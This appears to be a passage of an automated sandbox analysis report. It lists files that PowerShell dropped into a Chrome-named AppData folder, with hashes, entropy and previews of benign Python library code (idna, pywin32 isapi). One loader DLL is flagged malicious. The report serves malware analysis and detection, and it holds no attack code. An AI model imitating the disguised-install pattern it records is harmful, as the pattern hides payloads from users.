                                                                                                                                                                                                  Preview:# This file is automatically generated by tools/idna-data..__version__ = "16.0.0"..scripts = {. "Greek": (. 0x37000000374,. 0x37500000378,. 0x37A0000037E,. 0x37F00000380,. 0x38400000385,. 0x38600000387,. 0x3880000038B,. 0x38C0000038D,. 0x38E000003A2,. 0x3A3000003E2,. 0x3F000000400,. 0x1D2600001D2B,. 0x1D5D00001D62,. 0x1D6600001D6B,. 0x1DBF00001DC0,. 0x1F0000001F16,. 0x1F1800001F1E,. 0x1F2000001F46,. 0x1F4800001F4E,. 0x1F5000001F58,. 0x1F5900001F5A,. 0x1F5B00001F5C,. 0x1F5D00001F5E,. 0x1F5F00001F7E,. 0x1F8000001FB5,. 0x1FB600001FC5,. 0x1FC600001FD4,. 0x1FD600001FDC,. 0x1FDD00001FF0,. 0x1FF200001FF5,. 0x1FF600001FFF,. 0x212600002127,. 0xAB650000AB66,. 0x101400001018F,. 0x101A0000101A1,. 0x1D2000001D246,. ),. "Han": (. 0x2E80

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\idna\intranges.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):1898
                                                                                                                                                                                                  Entropy (8bit):4.518518430134968
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:48:wicNAdy/ORhzgncCbZOvyp1NGq6vbqgCbHmgXikyXP:pcG5YcCI01NGq6mgCbHmYPy/
                                                                                                                                                                                                  MD5:1B295D1420A220F7472FBE79EC1EB0C1
                                                                                                                                                                                                  SHA1:6EAA004ADE4EE81378C86CEC87646DFF617BE72F
                                                                                                                                                                                                  SHA-256:6A652D91D8587101BC66BF82A0C33F91545A731922BC2D568313756FADCA29D5
                                                                                                                                                                                                  SHA-512:C11A52A64C46848780AAC49C2D6B61A4EBD6EC771198C8C470A3624BE7C8A9D2A8D7D9D3CAE90761A1EA75EDB867716FEE99C6409DBB91FBF74809EFB3E8800A
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:""".Given a list of integers, made up of (hopefully) a small number of long runs.of consecutive integers, compute a representation of the form.((start1, end1), (start2, end2) ...). Then answer the question "was x present.in the original list?" in time O(log(# runs)).."""..import bisect.from typing import List, Tuple...def intranges_from_list(list_: List[int]) -> Tuple[int, ...]:. """Represent a list of integers as a sequence of ranges:. ((start_0, end_0), (start_1, end_1), ...), such that the original. integers are exactly those x such that start_i <= x < end_i for some i... Ranges are encoded as single integers (start << 32 | end), not as tuples.. """.. sorted_list = sorted(list_). ranges = []. last_write = -1. for i in range(len(sorted_list)):. if i + 1 < len(sorted_list):. if sorted_list[i] == sorted_list[i + 1] - 1:. continue. current_range = sorted_list[last_write + 1 : i + 1]. ranges.append(_encode_range(cu

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\idna\package_data.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):20
                                                                                                                                                                                                  Entropy (8bit):3.721928094887362
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:3:cvycP:8yI
                                                                                                                                                                                                  MD5:825C8CE5BF6CC089E5988E4E035D3025
                                                                                                                                                                                                  SHA1:58AA4F470ED582C69BFAD374B73471A2FB104506
                                                                                                                                                                                                  SHA-256:083F3DB50E23E8E03C9A92B8EA8F285CDB300FCB9DAF100703E6D89BCE0BA86A
                                                                                                                                                                                                  SHA-512:1B5914D72DFCAE9B728FAED20A6BE5AC09C5E912A38BD217222FF3CF94BFFAD64A5276000C3C3BFC2BB77D36D1F4516885720DCA9635E8A228078A798C51C0D5
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:__version__ = "3.9".

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\idna\uts46data.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, Unicode text, UTF-8 text executable
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):243725
                                                                                                                                                                                                  Entropy (8bit):4.1357991782001235
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:6144:a6xg7TWvNYBbPeVGKUJ8O8ng4Ynayk7z8:y
                                                                                                                                                                                                  MD5:BBAB719EA019C119FAF2E55A59FD2C9D
                                                                                                                                                                                                  SHA1:42C7CB4CD36A68FF4B1712A961B6B3845C1A1122
                                                                                                                                                                                                  SHA-256:1FD277E55903D05F4BF6628EAA378D19DD80F956BA1653E8CFA273E0AEE1FA9B
                                                                                                                                                                                                  SHA-512:533DFC39CD088A2DB67B9B2BF6AC13195A8670C9D0898797AB508DDB1DEB1F04D411F1C86F3ED3C7E5C69822689947B057170C1AED365A04BBFDC41354035F59
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:# This file is automatically generated by tools/idna-data.# vim: set fileencoding=utf-8 :..from typing import List, Tuple, Union.."""IDNA Mapping Table from UTS46."""...__version__ = "16.0.0"...def _seg_0() -> List[Union[Tuple[int, str], Tuple[int, str, str]]]:. return [. (0x0, "V"),. (0x1, "V"),. (0x2, "V"),. (0x3, "V"),. (0x4, "V"),. (0x5, "V"),. (0x6, "V"),. (0x7, "V"),. (0x8, "V"),. (0x9, "V"),. (0xA, "V"),. (0xB, "V"),. (0xC, "V"),. (0xD, "V"),. (0xE, "V"),. (0xF, "V"),. (0x10, "V"),. (0x11, "V"),. (0x12, "V"),. (0x13, "V"),. (0x14, "V"),. (0x15, "V"),. (0x16, "V"),. (0x17, "V"),. (0x18, "V"),. (0x19, "V"),. (0x1A, "V"),. (0x1B, "V"),. (0x1C, "V"),. (0x1D, "V"),. (0x1E, "V"),. (0x1F, "V"),. (0x20, "V"),. (0x21, "V"),. (0x22, "V"),.

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\isapi\PyISAPI_loader.dll

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):54272
                                                                                                                                                                                                  Entropy (8bit):6.148775813397798
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:1536:NJG3XLZ6PgxGlDboKh2wuHXDHopF4zk01s5YcCuzOVn1eo:NJoCBCuzOVn1e
                                                                                                                                                                                                  MD5:43FAA16056FBA69EEF1B052D715FA46F
                                                                                                                                                                                                  SHA1:D1EB4D1604B828DF78436E431B1B676D6E63C404
                                                                                                                                                                                                  SHA-256:96F3F828DCF671DBB24B3B52C20DF990954A77E636A3DE77BF35E4A041B52F89
                                                                                                                                                                                                  SHA-512:18D4E891EEF5CF70757946A67CD77186BE2723407F7EAC86D2A2A4CC4A13F29BA0F19B6830944C9FB8FBE0315CD1A6A27F534840966C05857FED8CDB3F3F0E92
                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........."..hLI.hLI.hLI...I.hLI..MH.hLI...I.hLI..IH.hLI..HH.hLI..OH.hLIV.MH.hLI..MH.hLI.hMI.hLI0.EH.hLI0.LH.hLI0..I.hLI0.NH.hLIRich.hLI........PE..L...,..d...........!.....~...R............................................................@.....................................................................`...(...T...............................@............................................text...\}.......~.................. ..`.rdata...........0..................@..@.data...............................@....rsrc...............................@..@.reloc..`...........................@..B................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\isapi\__init__.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):1228
                                                                                                                                                                                                  Entropy (8bit):4.499657925503658
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:24:RlKrjxtACEOd/YACnNSwoKtTWxNm5b8WqAuvKMJbK:RErjxtj/Cjo4Tw+b8XAnkbK
                                                                                                                                                                                                  MD5:376B863A5D71D683CE42E07F90E31D70
                                                                                                                                                                                                  SHA1:0B352BA4DC53F35EB4F0AB2A59F1033791193013
                                                                                                                                                                                                  SHA-256:2566CAC7219E2D93BF8AB966F9542247307450FF213A4FE1C115635774ABF310
                                                                                                                                                                                                  SHA-512:81BF1BBFCF88ED20EE020B0D555DD96FE7E19F165C1D222A311E717AE1A189223BA7ABABAF774CDEB91C4C1C84B1BCE5063FABDBBEDE8FE8B15D9E9F8E560C73
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:# The Python ISAPI package....# Exceptions thrown by the DLL framework..class ISAPIError(Exception):. def __init__(self, errno, strerror=None, funcname=None):. # named attributes match IOError etc.. self.errno = errno. self.strerror = strerror. self.funcname = funcname. Exception.__init__(self, errno, strerror, funcname).. def __str__(self):. if self.strerror is None:. try:. import win32api.. self.strerror = win32api.FormatMessage(self.errno).strip(). except:. self.strerror = "no error message is available". # str() looks like a win32api error.. return str((self.errno, self.strerror, self.funcname))...class FilterError(ISAPIError):. pass...class ExtensionError(ISAPIError):. pass...# A little development aid - a filter or extension callback function can.# raise one of these exceptions, and the handler module will be reloaded..# This means you can change

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\isapi\doc\isapi.html

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:HTML document, ASCII text
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):4160
                                                                                                                                                                                                  Entropy (8bit):4.872533696011899
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:96:6AJQczz0jdpALt4DVI6HVt6Lu90PYC7drlFDeiI97qqUFXB6wpe3f04p:6hLVt6NQCxiihXMwcv04p
                                                                                                                                                                                                  MD5:F7697BC2AEAE59A9BEDFABD3192E80FF
                                                                                                                                                                                                  SHA1:BB4B1E7F5F7626F2F3DC2490931355658A6212D9
                                                                                                                                                                                                  SHA-256:0B67CC1EF06CCFD881C29DA61C775C52B634C7BCA1EAB5B19AC2A1685B0164EE
                                                                                                                                                                                                  SHA-512:06C654ED9EEE02BE94ED3FE7BB10E22A878EFCDE089916DECE2B4A305A27E7CC26FD743C31F43038AE87AB7AD1F93848E5499DF4AEC85254651833384AE585A1
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview: NOTE: This HTML is displayed inside the CHM file - hence some hrefs. will only work in that environment.-->.<HTML>.<BODY>.<TITLE>Introduction to Python ISAPI support</TITLE>..<h2>Introduction to Python ISAPI support</h2>..<h3>See also</h3>.<ul>. <li><a href="/isapi_modules.html">The isapi related modules</a>. </li>. <li><a href="/isapi_objects.html">The isapi related objects</a>. </li>.</ul>.<p><i>Note: if you are viewing this documentation directly from disk, .most links in this document will fail - you can also find this document in the.CHM file that comes with pywin32, where the links will work</i>..<h3>Introduction</h3>.This documents Python support for hosting ISAPI exensions and filters inside.Microsoft Internet Information Server (IIS). It assumes a basic understanding .of the ISAPI filter and extension mechanism..<p>.In summary, to implement a filter or extension, you provide a Python module.which defines a Filter and/or Extension class. Once your class ha

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\isapi\install.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):27548
                                                                                                                                                                                                  Entropy (8bit):4.80049866836599
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:hJYoQ+eiFRdjkLsgNUN5+E1pLYZgz2IvGc1d7NenkZ39NMm3XhKL7/Qtuja3IqL3:hJYB+dEZgfd7jnhKL7Lj8
                                                                                                                                                                                                  MD5:EEAACC07EF7A57FC7B89F22229302A20
                                                                                                                                                                                                  SHA1:5D811D557CA4EC188AA082F591E04E67F8EF9C7F
                                                                                                                                                                                                  SHA-256:E3CBDB7EEC55BBBFB01247DA999C44C0FDD2A195EE940102C7D486AA4D8F4A95
                                                                                                                                                                                                  SHA-512:D958531DEB0EB2544E9894F3F9903AD586D02EC818DCF10F2A1867427B24BC54000490EBD5CE4C01659F38D3ECF79AB35584DD3578BF8E62BE225DD9918816E5
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:"""Installation utilities for Python ISAPI filters and extensions."""..# this code adapted from "Tomcat JK2 ISAPI redirector", part of Apache.# Created July 2004, Mark Hammond..import imp.import os.import shutil.import stat.import sys.import traceback..import pythoncom.import win32api.import winerror.from win32com.client import Dispatch, GetObject.from win32com.client.gencache import EnsureDispatch, EnsureModule.._APP_INPROC = 0._APP_OUTPROC = 1._APP_POOLED = 2._IIS_OBJECT = "IIS://LocalHost/W3SVC"._IIS_SERVER = "IIsWebServer"._IIS_WEBDIR = "IIsWebDirectory"._IIS_WEBVIRTUALDIR = "IIsWebVirtualDir"._IIS_FILTERS = "IIsFilters"._IIS_FILTER = "IIsFilter".._DEFAULT_SERVER_NAME = "Default Web Site"._DEFAULT_HEADERS = "X-Powered-By: Python"._DEFAULT_PROTECTION = _APP_POOLED..# Default is for 'execute' only access - ie, only the extension.# can be used. This can be overridden via your install script.._DEFAULT_ACCESS_EXECUTE = True._DEFAULT_ACCESS_READ = False._DEFAULT_ACCESS_WRITE = False._DE

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\isapi\isapicon.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):4114
                                                                                                                                                                                                  Entropy (8bit):5.185071284936749
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:96:Nqm1DicrfeDD8kMzF6d0kcxzn2t3Q9sstnc9QRKPpP74s:z2crfEDIxzn2WRRKPNl
                                                                                                                                                                                                  MD5:CA18DB7C20AF8050260A221CEEEA7A3B
                                                                                                                                                                                                  SHA1:9FC7F2F131C6F48426E9D80146F1721335478498
                                                                                                                                                                                                  SHA-256:87876EF7D98051AE7BE5DEEE74A9007423B6C3447509CDE0DB6A1FD8BA1B3385
                                                                                                                                                                                                  SHA-512:E7141A1AC5E6E89B96BF11F7460BD2322F2B5FB96282A409D1D56B4DB0D4EA2B43A97EDB39AAFCBEBF808C060BADEEDF5446B7A8E8E09B52E1541E8BF9CAFD40
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:"""Constants needed by ISAPI filters and extensions.""".# ======================================================================.# Copyright 2002-2003 by Blackdog Software Pty Ltd..#.# All Rights Reserved.#.# Permission to use, copy, modify, and distribute this software and.# its documentation for any purpose and without fee is hereby.# granted, provided that the above copyright notice appear in all.# copies and that both that copyright notice and this permission.# notice appear in supporting documentation, and that the name of.# Blackdog Software not be used in advertising or publicity pertaining to.# distribution of the software without specific, written prior.# permission..#.# BLACKDOG SOFTWARE DISCLAIMS ALL WARRANTIES WITH REGARD TO THIS SOFTWARE,.# INCLUDING ALL IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS, IN.# NO EVENT SHALL BLACKDOG SOFTWARE BE LIABLE FOR ANY SPECIAL, INDIRECT OR.# CONSEQUENTIAL DAMAGES OR ANY DAMAGES WHATSOEVER RESUL

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\isapi\samples\advanced.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):7877
                                                                                                                                                                                                  Entropy (8bit):4.715640535610007
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:192:eBNSH7SzvwWyrS9knaovBgTxaKqS2eqLFwtxKQUGBzYCvW:eDSH77XrS9kUYnS2eiwiwYWW
                                                                                                                                                                                                  MD5:E94564D9A392DCD2D053BEA5B750EDF6
                                                                                                                                                                                                  SHA1:C809C32E27BB0FC20FBA0FDBA379CE5E4A0E86C7
                                                                                                                                                                                                  SHA-256:244171C764D7E35F0558D3BE46D76223A11B469DD8B0186604059E4F2833C4CB
                                                                                                                                                                                                  SHA-512:DE08AA962A1D72F471618EDA9E11CA562F8FCBA3396D17E3DAD32215DC007E373EBDB1380711795AA8A165ED651677D9DD8342C3DF531599B80BE488995417B2
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:# This extension demonstrates some advanced features of the Python ISAPI.# framework..# We demonstrate:.# * Reloading your Python module without shutting down IIS (eg, when your.# .py implementation file changes.).# * Custom command-line handling - both additional options and commands..# * Using a query string - any part of the URL after a '?' is assumed to.# be "variable names" separated by '&' - we will print the values of.# these server variables..# * If the tail portion of the URL is "ReportUnhealthy", IIS will be.# notified we are unhealthy via a HSE_REQ_REPORT_UNHEALTHY request..# Whether this is acted upon depends on if the IIS health-checking.# tools are installed, but you should always see the reason written.# to the Windows event log - see the IIS documentation for more...import os.import stat.import sys..from isapi import isapicon.from isapi.simple import SimpleExtension..if hasattr(sys, "isapidllhandle"):. import win32traceutil..# Notes on reloading.# If yo

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\isapi\samples\redirector.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):4789
                                                                                                                                                                                                  Entropy (8bit):4.672778044819042
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:96:sG5aXbrq9zbjBJxRHugKn7AcOZRcBGOt6ALeQYuAHQQ0i:sGAXbr6DZ99K7AcOZyt6AaYCb
                                                                                                                                                                                                  MD5:2EB58F29631C6821D8A299983426CF40
                                                                                                                                                                                                  SHA1:9E9013BA1682555FAA42F5DFBD6819D93B547C9A
                                                                                                                                                                                                  SHA-256:499C76110B5D506499A3854DA0FB197001515A755838EF9EDD9821E126B04366
                                                                                                                                                                                                  SHA-512:3376874BFA3FBD2BE21E5196C46489DCAF53D2EF7C47C1E9305DD399C087E22A75E11DCAD4CDF9DE6345ED4E9427149BE23DFE08802B9F14A3EACDFAB9AEC45D
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:# This is a sample ISAPI extension written in Python..#.# Please see README.txt in this directory, and specifically the.# information about the "loader" DLL - installing this sample will create.# "_redirector.dll" in the current directory. The readme explains this...# Executing this script (or any server config script) will install the extension.# into your web server. As the server executes, the PyISAPI framework will load.# this module and create your Extension and Filter objects...# This is the simplest possible redirector (or proxy) we can write. The.# extension installs with a mask of '*' in the root of the site..# As an added bonus though, we optionally show how, on IIS6 and later, we.# can use HSE_ERQ_EXEC_URL to ignore certain requests - in IIS5 and earlier.# we can only do this with an ISAPI filter - see redirector_with_filter for.# an example. If this sample is run on IIS5 or earlier it simply ignores.# any excludes...import sys..from isapi import isapicon, threaded_extens

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\isapi\samples\redirector_asynch.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):2723
                                                                                                                                                                                                  Entropy (8bit):4.8440518325238875
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:48:r2m9gHV9aeJPLBZMATZhOcxerr3x8AHud1YKGaJxOoE8x6ALLaQYuAHQru5w/Fob:rV9G9zYATZpxerDxRHuwBaJN56ALeQYJ
                                                                                                                                                                                                  MD5:87F0CD8E3ECACAB6BC5AE7C8859624A6
                                                                                                                                                                                                  SHA1:B1D320A9C99C28534D12AFDD7716A5BE595313CB
                                                                                                                                                                                                  SHA-256:6E0ED62598D6806889B4554A85DB9FA63B719AF74F060BEE5AE4C1B99AF44AF4
                                                                                                                                                                                                  SHA-512:9528E5DC2B5D1559A3558FCA3F541186F9141B3487E4C7F275CF7451FDFC419DF92087FC3F02BF1DF36A01B7E84BB59292A7069E1C845A51D8940DAEEF0752DF
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:# This is a sample ISAPI extension written in Python...# This is like the other 'redirector' samples, but uses asnch IO when writing.# back to the client (it does *not* use asynch io talking to the remote.# server!)..import sys.import urllib.error.import urllib.parse.import urllib.request..from isapi import isapicon, threaded_extension..# sys.isapidllhandle will exist when we are loaded by the IIS framework..# In this case we redirect our output to the win32traceutil collector..if hasattr(sys, "isapidllhandle"):. import win32traceutil..# The site we are proxying..proxy = "http://www.python.org"..# We synchronously read chunks of this size then asynchronously write them..CHUNK_SIZE = 8192...# The callback made when IIS completes the asynch write..def io_callback(ecb, fp, cbIO, errcode):. print("IO callback", ecb, fp, cbIO, errcode). chunk = fp.read(CHUNK_SIZE). if chunk:. ecb.WriteClient(chunk, isapicon.HSE_IO_ASYNC). # and wait for the next callback to say thi

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\isapi\samples\redirector_with_filter.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):6459
                                                                                                                                                                                                  Entropy (8bit):4.718310882378029
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:192:XGHkDjB5EpC79K4LdaPxZmI+gqehDSmI7b2u4R7AVYCIw:XGEDV5EpChbLdaJKBeYbTYXw
                                                                                                                                                                                                  MD5:B4F1ED76C296CB5A03E14CCC292CC9B2
                                                                                                                                                                                                  SHA1:9AF425A8903F4F06AAB99A2FF61F33BB1ECFBB4E
                                                                                                                                                                                                  SHA-256:F1B8AA33D41182EE3FFAD329A4CA2766B1C9693EE6C80F84E725C40D6E522AEB
                                                                                                                                                                                                  SHA-512:D5DF8D63C33E9E9A582218FCF8B229BE5CF0E2BC649B17192B08D6E37FA82A1B57F7455724A6771C1EBD74E5B15DCE99EB94AAEC639EAFBE896776D61CAEB9F1
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:# This is a sample configuration file for an ISAPI filter and extension.# written in Python..#.# Please see README.txt in this directory, and specifically the.# information about the "loader" DLL - installing this sample will create.# "_redirector_with_filter.dll" in the current directory. The readme explains.# this...# Executing this script (or any server config script) will install the extension.# into your web server. As the server executes, the PyISAPI framework will load.# this module and create your Extension and Filter objects...# This sample provides sample redirector:.# It is implemented by a filter and an extension, so that some requests can.# be ignored. Compare with 'redirector_simple' which avoids the filter, but.# is unable to selectively ignore certain requests..# The process is sample uses is:.# * The filter is installed globally, as all filters are..# * A Virtual Directory named "python" is setup. This dir has our ISAPI.# extension as the only application, mapped

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\isapi\samples\test.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):6318
                                                                                                                                                                                                  Entropy (8bit):4.566729696244953
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:96:Iskw+JLCJx5KaB9GbV5qdO4U0p8K3aSzYLv4YqQFzCHLkWwUcdQUGBLHQYuAHQ4V:Isk2vBgT0aKqSaRzCHLFwtdQUGBzYC4W
                                                                                                                                                                                                  MD5:4898630ADAF813D8B0A23E92C377746A
                                                                                                                                                                                                  SHA1:8E5ADFF4FAFCA8CAA6DEEBF9490EB393C8E3EE59
                                                                                                                                                                                                  SHA-256:07A0ED251A46D73E2B00A13597F2B69BB7BE6035F88B8172573162407FA6B7CC
                                                                                                                                                                                                  SHA-512:D9F1C51F215EF170BC69D1FB6F95ABE76D626266FCAE9AC33AEC23119AB67E0DC6F42E294D22CAD8E29A77B381177AE4092390869AA544A460FBF08C888DD057
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:# This extension is used mainly for testing purposes - it is not.# designed to be a simple sample, but instead is a hotch-potch of things.# that attempts to exercise the framework...import os.import stat.import sys..from isapi import isapicon.from isapi.simple import SimpleExtension..if hasattr(sys, "isapidllhandle"):. import win32traceutil..# We use the same reload support as 'advanced.py' demonstrates..import threading..import win32con.import win32event.import win32file.import winerror..from isapi import InternalReloadException...# A watcher thread that checks for __file__ changing..# When it detects it, it simply sets "change_detected" to true..class ReloadWatcherThread(threading.Thread):. def __init__(self):. self.change_detected = False. self.filename = __file__. if self.filename.endswith("c") or self.filename.endswith("o"):. self.filename = self.filename[:-1]. self.handle = win32file.FindFirstChangeNotification(. os.path.dir

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\isapi\simple.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):2444
                                                                                                                                                                                                  Entropy (8bit):4.437690052854761
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:48:p2C72ZW43m46ZEu/4adcD961wmQhHm46ZXnLVPM66G4YS961NT:p343oEBD+wmEHoXLBaaS+NT
                                                                                                                                                                                                  MD5:E63FC55BD3949A33079F97803140971D
                                                                                                                                                                                                  SHA1:9D52B4C9062B97F44ECEB5074F6D71117D750844
                                                                                                                                                                                                  SHA-256:435FB9AF375154250BA521A2D478D110D1E1A82E0311A6293611065824BED1F0
                                                                                                                                                                                                  SHA-512:7A15E6956D5BCA76E2C8C028896F9488E6DAE2A6B5E6B0624B8AD1EB280D9ABEFBA1488C76C74C25A87B710DF52C7AC752DAF34A0F01F7366C9ADE55FDCF1D97
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:"""Simple base-classes for extensions and filters...None of the filter and extension functions are considered 'optional' by the.framework. These base-classes provide simple implementations for the.Initialize and Terminate functions, allowing you to omit them,..It is not necessary to use these base-classes - but if you don't, you.must ensure each of the required methods are implemented.."""...class SimpleExtension:. "Base class for a simple ISAPI extension".. def __init__(self):. pass.. def GetExtensionVersion(self, vi):. """Called by the ISAPI framework to get the extension version.. The default implementation uses the classes docstring to. set the extension description.""". # nod to our reload capability - vi is None when we are reloaded.. if vi is not None:. vi.ExtensionDesc = self.__doc__.. def HttpExtensionProc(self, control_block):. """Called by the ISAPI framework for each extension request... sub-cla

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\isapi\test\extension_simple.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):4374
                                                                                                                                                                                                  Entropy (8bit):4.72440993117079
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:96:aQ6VvLzWLQHuOYl2dIIa4iq3+OYcRQsALeQYuAHQv0i:aQr2bYl2eIa4iqOOYwvAaYCQ
                                                                                                                                                                                                  MD5:A1328B4C7E2744F219AAAF7AD410BF95
                                                                                                                                                                                                  SHA1:FA9323DDA3ECA819FD2B099D9A27777E4F688186
                                                                                                                                                                                                  SHA-256:D9D6724BFCED45609F1D60ADB776DF6B2B56DBDCFBC6B6CB6C0C24F3DA329DB5
                                                                                                                                                                                                  SHA-512:5FA4C9AB245580417E1D1610ED8085E387F9EA1247CEB5D138127C5AFF58F033D76137701708752131F3F0032982D813B222F7A6E93481169C9266A176ADF566
                                                                                                                                                                                                  Malicious:false
